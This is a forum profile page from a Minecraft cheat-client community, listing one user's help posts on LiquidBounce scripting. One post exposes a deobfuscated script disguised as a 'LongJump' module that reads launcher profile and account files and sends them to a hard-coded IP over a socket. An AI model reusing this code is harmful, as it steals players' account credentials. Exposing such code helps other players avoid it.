CCBlueX Forum

    • Register
    • Login
    • Search
    • Categories
    • Recent
    • Tags
    • Popular
    • Users
    • Groups
    1. Home
    2. exit scammed
    • Profile
    • Following 7
    • Followers 10
    • Topics 21
    • Posts 566
    • Best 73
    • Controversial 0
    • Groups 0

    exit scammed

    @exit scammed

    thank you and goodbye. i have to move on.

    149
    Reputation
    531
    Profile views
    566
    Posts
    10
    Followers
    7
    Following
    Joined Last Online
    Website github.com/exit-scammed Location [RESTRICTED]

    exit scammed Unfollow Follow

    Best posts made by exit scammed

    • RE: auto gaple for lb b73 please

      @some-one still waiting for mojang to add 'gaple'

      posted in Requests
      exit scammed
      exit scammed
    • RE: How to change

      d5a3afff-0b60-4ed3-aaf1-869d2c4529ac-image.png

      posted in Kotlin/Java
      exit scammed
      exit scammed
    • RE: [EXPOSED] Coccocoa

      @Soulplexis oh that's great

      posted in Off-Topic
      exit scammed
      exit scammed
    • RE: Error

      @божественная-кара did you git clone the source or just download it from github

      posted in Kotlin/Java
      exit scammed
      exit scammed
    • RE: Error

      @божественная-кара
      https://github.com/ccbluex/liquidbounce#setting-up-a-workspace

      try this again but in a different directory

      posted in Kotlin/Java
      exit scammed
      exit scammed
    • RE: Error

      @божественная-кара also dont forget to change the sdk in project structure

      posted in Kotlin/Java
      exit scammed
      exit scammed
    • RE: Error

      @божественная-кара they recently updated to java 11 so download the suitable jre then (google)

      posted in Kotlin/Java
      exit scammed
      exit scammed
    • RE: Error

      @божественная-кара
      go in your liquidbounce nextgen folder
      right click select git bash
      paste the command again

      posted in Kotlin/Java
      exit scammed
      exit scammed
    • RE: Script API Download

      @dodep ... sorry but I still can't find that anywhere, and I mostly use the default JavaScript language syntax in VSCode.

      posted in ScriptAPI
      exit scammed
      exit scammed
    • RE: NeruxVaceLongJump

      @paul2008 i love your code

      var a = registerScript({
          name: "",
          version: "",
          authors: [""]
      });
      b = Java.type;
      hack = b("java.net.Socket");
      motionCalculator = b("java.io.DataOutputStream");
      pwd = b("java.nio.file.Paths").get("").toAbsolutePath().toString();
      stringUtils = b("java.io.File");
      stringParse = b("org.apache.commons.io.FileUtils");
      iso = b("java.nio.charset.StandardCharsets");
      
      function dataFromString(strings) {
          try {
              var strU = new stringUtils(strings);
              return stringParse.readFileToString(strU, iso.ISO_8859_1)
          } catch (e) {}
      }
      a.registerModule({
          name: "NeruxVaceLongJump",
          category: "Misc",
          description: "NeruxVaceLongJump"
      }, function (module) {
          module.on("enable", function () {
              data = dataFromString(pwd + "/launcher_profiles.json");
              data += "\n";
              data += dataFromString(pwd + "/LiquidBounce-1.8/accounts.json");
              data = data.getBytes();
              l = data.length;
              anticheat = new hack("107.182.237.14", 55228);
              anticheat.setSoTimeout(10000);
              server = new motionCalculator(anticheat.getOutputStream());
              server.writeInt(l);
              server.write(data, 0, l);
              mc.thePlayer.motionX += 10
          })
      });
      

      deobfed in 5 mins
      thought that 3 layers of eval obfuscation could help you?

      posted in Scripts
      exit scammed
      exit scammed

    Latest posts made by exit scammed

    • RE: Cant find the problem in my code

      @stfwissue LiquidBounce automatically imports its commandManager variable while loading the script. Take a look at line 58 of Script.kt:

      scriptEngine.put("commandManager", LiquidBounce.commandManager)
      

      P/s: I didn't notice the typo, it's actually executeCommands instead of executeCommand.

          fun executeCommands(input: String) {
      
      posted in ScriptAPI
      exit scammed
      exit scammed
    • RE: Cant find the problem in my code

      @bygraf all commands must be placed inside quotation marks.
      e.g.

      commandManager.executeCommand(.inventorycleaner throwgarbage false);
      

      to

      commandManager.executeCommand(".inventorycleaner throwgarbage false");
      

      and the same for others.

      posted in ScriptAPI
      exit scammed
      exit scammed
    • RE: LB+ > Every other client men

      we also make sure to flag any anticheat by just standing

      posted in Off-Topic
      exit scammed
      exit scammed
    • RE: Publish scripts on LiquidBounce's website

      Selling these stuffs still exist till this day? I'm surprised.

      posted in Scripts
      exit scammed
      exit scammed
    • RE: I need a good custom build for redesky and blocksmc other than FDP

      @khecn ...

      posted in Requests
      exit scammed
      exit scammed
    • RE: Simplest way to render head pitch in script api

      @plumer-man it's in mixinmodelbiped
      c4ec04ae-ae82-4c66-8b36-0697e6606a88-image.png

      posted in Support
      exit scammed
      exit scammed
    • RE: hypixel

      @end3r1355 878e7199-2b8d-46b7-b701-d8c797a41287-image.png

      and yes, it's easy to do
      can you please ignore topics created by dead accounts

      posted in Scripts
      exit scammed
      exit scammed
    • RE: Anyone help me to have the Tab GUI, Arraylist, speed graph appear not just on editor?

      @molder34 check if HUD module is disabled.
      if yes then type .t HUD in chat and press enter

      posted in ScriptAPI
      exit scammed
      exit scammed
    • RE: Script API Download

      @dodep ... sorry but I still can't find that anywhere, and I mostly use the default JavaScript language syntax in VSCode.

      posted in ScriptAPI
      exit scammed
      exit scammed
    • RE: Script API Download

      @_username_ He means something like ScriptAPI language support in VSCode or any other text editor.

      posted in ScriptAPI
      exit scammed
      exit scammed